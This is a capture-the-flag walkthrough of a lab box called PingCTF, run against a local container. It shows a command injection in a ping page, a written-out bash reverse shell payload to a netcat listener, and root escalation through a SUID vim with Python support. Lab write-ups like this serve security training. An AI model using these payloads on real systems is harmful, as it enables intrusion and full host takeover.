PingCTF
Reconnaissance
┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap 172.17.0.2 -sV -A -p-
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-08-05 19:57 +08
Nmap scan report for 172.17.0.2
Host is up (0.000043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Ping
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.04 ms 172.17.0.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.24 secondsWell, there is only one open port. Let's check it out.
"Once you access port 80, you'll see a simple IP address checker page. Try sending a request by clicking the blue button. Eventually, it redirects to ping.php?target=. So, I tried this Command Injection payload: 127.0.0.1; ls worked perfectly, listing files under the www-data user. Now, instead of the ls command, try injecting a reverse shell that connects back to your netcat listener.
www-data
Start netcat lister: nc -lnvp 4444
Injection the payload: 127.0.0.1; bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1' OR http://172.17.0.2/ping.php?target=127.0.0.1%3B+bash+-c+'bash+-i+>%26+%2Fdev%2Ftcp%2F172.17.0.1%2F4444+0>%261'
Root
The first thing I did was running linpeas.sh script and looked for suspicious things. Then I've found one file called vim.basic which has root access.
You can find it from SUID Files: find / -perm -u=s -type f 2>/dev/null
www-data@f2456883b1f4:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/vim.basic
www-data@f2456883b1f4:/var/www/html$ ls -l /usr/bin/vim.basic
ls -l /usr/bin/vim.basic -rwsr-xr-x 1 root root 4126400 Apr 1 20:12 /usr/bin/vim.basicI looked over the internet about Privilege Escalation Vulnerability in Vim editor and found quite good one here.
I tried the first payload, but it didn't work as expected because Vim intentionally drops root privileges at startup.
To get know more about our vim.basic, I used /usr/bin/vim.basic --help command to get information.
www-data@f2456883b1f4:/var/www/html$ /usr/bin/vim.basic --version
/usr/bin/vim.basic --version
VIM - Vi IMproved 9.1 (2024 Jan 02, compiled Apr 01 2025 20:12:31)
Included patches: 1-16, 647, 678, 697
Modified by team+vim@tracker.debian.org
Compiled by team+vim@tracker.debian.org
Huge version without GUI. Features included (+) or not (-):
+acl +file_in_path +mouse_urxvt -tag_any_white
+arabic +find_in_path +mouse_xterm -tcl
+autocmd +float +multi_byte +termguicolors
+autochdir +folding +multi_lang +terminal
-autoservername -footer -mzscheme +terminfo
-balloon_eval +fork() +netbeans_intg +termresponse
+balloon_eval_term +gettext +num64 +textobjects
-browse -hangul_input +packages +textprop
++builtin_terms +iconv +path_extra +timers
+byte_offset +insert_expand -perl +title
+channel +ipv6 +persistent_undo -toolbar
+cindent +job +popupwin +user_commands
-clientserver +jumplist +postscript +vartabs
-clipboard +keymap +printer +vertsplit
+cmdline_compl +lambda +profile +vim9script
+cmdline_hist +langmap -python +viminfo
+cmdline_info +libcall +python3 +virtualedit
+comments +linebreak +quickfix +visual
+conceal +lispindent +reltime +visualextra
+cryptv +listcmds +rightleft +vreplace
+cscope +localmap -ruby +wildignore
+cursorbind -lua +scrollbind +wildmenu
+cursorshape +menu +signs +windows
+dialog_con +mksession +smartindent +writebackup
+diff +modify_fname +sodium -X11
+digraphs +mouse -sound +xattr
-dnd -mouseshape +spell -xfontset
-ebcdic +mouse_dec +startuptime -xim
+emacs_tags +mouse_gpm +statusline -xpm
+eval -mouse_jsbterm -sun_workshop -xsmp
+ex_extra +mouse_netterm +syntax -xterm_clipboard
+extra_search +mouse_sgr +tag_binary -xterm_save
-farsi -mouse_sysmouse -tag_old_static
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H -Wdate-time -g -O2 -fno-omit-frame-pointer -mno-omit-leaf-frame-pointer -ffile-prefix-map=/build/vim-AkQQan/vim-9.1.0016=. -flto=auto -ffat-lto-objects -fstack-protector-strong -fstack-clash-protection -Wformat -Werror=format-security -fcf-protection -fdebug-prefix-map=/build/vim-AkQQan/vim-9.1.0016=/usr/src/vim-2:9.1.0016-1ubuntu7.8 -DSYS_VIMRC_FILE=\"/etc/vim/vimrc\" -DSYS_GVIMRC_FILE=\"/etc/vim/gvimrc\" -D_REENTRANT -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: gcc -Wl,-Bsymbolic-functions -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -Wl,--as-needed -o vim -lm -ltinfo -lselinux -lsodium -lacl -lattr -lgpm -L/usr/lib/python3.12/config-3.12-x86_64-linux-gnu -lpython3.12 -ldl -lmPerfect, it's being compiled by +python3 That means I can escalate to root using Python inside Vim by spawning a root shell via SUID privileges. Use the third c) payload from GTFOBins
1. /usr/bin/vim.basic
2. vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'What this does:
Runs Python3 inside Vim
Calls os.execl() to launch a new shell
sh -p preserves the SUID root privilegesYou now have a real root shell! 🎉 This is how I got so far.
Last updated